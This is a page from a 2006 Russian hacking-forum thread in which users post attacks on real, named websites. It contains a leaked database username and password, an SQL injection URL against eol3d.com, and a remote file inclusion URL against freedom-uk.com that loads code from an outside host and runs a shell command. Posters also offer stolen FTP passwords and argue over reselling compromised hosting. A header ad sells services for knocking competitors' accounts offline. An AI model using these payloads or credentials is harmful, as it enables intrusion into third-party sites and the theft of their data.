Форум АНТИЧАТ - Уязвимости на fantoo.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Уязвимости на fantoo.ru

Страница 3 из 4

Опции темы

Поиск в этой теме

Опции просмотра

#21

19.02.2006, 01:23

Inferno

Участник форума

Регистрация: 30.12.2005

Сообщений: 155

Провел на форуме:
2714612

Репутация: 31

Цитата:

Description ----------- The Drupal Security Team has found that the privilege system of Drupal can be circumvented in a very special case because an input check is not implemented properly.

Цитата:

Impact ------ If public registration is allowed then it is possible for an attacker to obtain additional user roles. As a result, an attacker could grant himself administration privileges.

Багов есть много)

#22

19.02.2006, 01:26

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

Попробуй провести атаку и реализовать багу

#23

19.02.2006, 01:40

limpompo

Друг Клитора

Регистрация: 27.08.2005

Сообщений: 1,662

Провел на форуме:
6913553

Репутация: 1329

$_DBCFG['dbuname'] = "freedom_coin2";
$_DBCFG['dbpass'] = "8wns9NvEKDwS";

#24

19.02.2006, 01:43

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

нда, хостер.. )

мы про движок)

Последний раз редактировалось Rebz; 19.02.2006 в 01:50..

#25

19.02.2006, 01:43

D1mOn

Постоянный

Регистрация: 02.10.2005

Сообщений: 490

Провел на форуме:
2333839

Репутация: 212

эт ты про хостера)

#26

19.02.2006, 16:11

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

Отправить сообщение для Mobile с помощью ICQ

http://eol3d.com бага на форуме (и в галерее)
двиг- Invision Power Board
Диагноз sql иньекция
http://eol3d.com/forum/index.php?act=module&module=gallery&cmd=slideshow& show='

#27

19.02.2006, 16:22

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

это и есть sql-inj

Ток вы уже не по теме стали писать..эх

#28

19.02.2006, 16:24

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

Цитата:

Сообщение от Rebz

это и есть sql-inj

Ток вы уже не по теме стали писать..эх

А я просто багу выложил, тыж сам говорил выкладывайте баги...

#29

19.02.2006, 18:56

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

если кому нужны ftp пассы к сайтам, ставьте (+), я пасс в ПМ отправлю
сайты в домене com

#30

21.02.2006, 17:21

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

Цитата:

Сообщение от Mobile

На http://www.freedom-uk.com багу нашёл
Это хостинг английский, бага в phpcoin
Диагноз выполнение никсовых команд
например
http://www.freedom-uk.com/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id

Народ, имейте совесть! Я выложил этот пример не для того чтоб несколько человек продавали один и тот-же хостинг. Это несовсем честно...
Ищите баги на сайтах сами

Страница 3 из 4

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Какие уязвимости есть в IPB v1.1.2?	Inferno	Форумы	2	26.06.2007 22:23
Вопрос про уязвимости в ExBB 1.9	cardons	Форумы	10	30.01.2006 23:57
Уязвимости чатов	L@nd@R	Чаты	4	03.04.2005 05:12
Вопрос про уязвимости в exbb		Форумы	1	02.08.2004 19:17

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход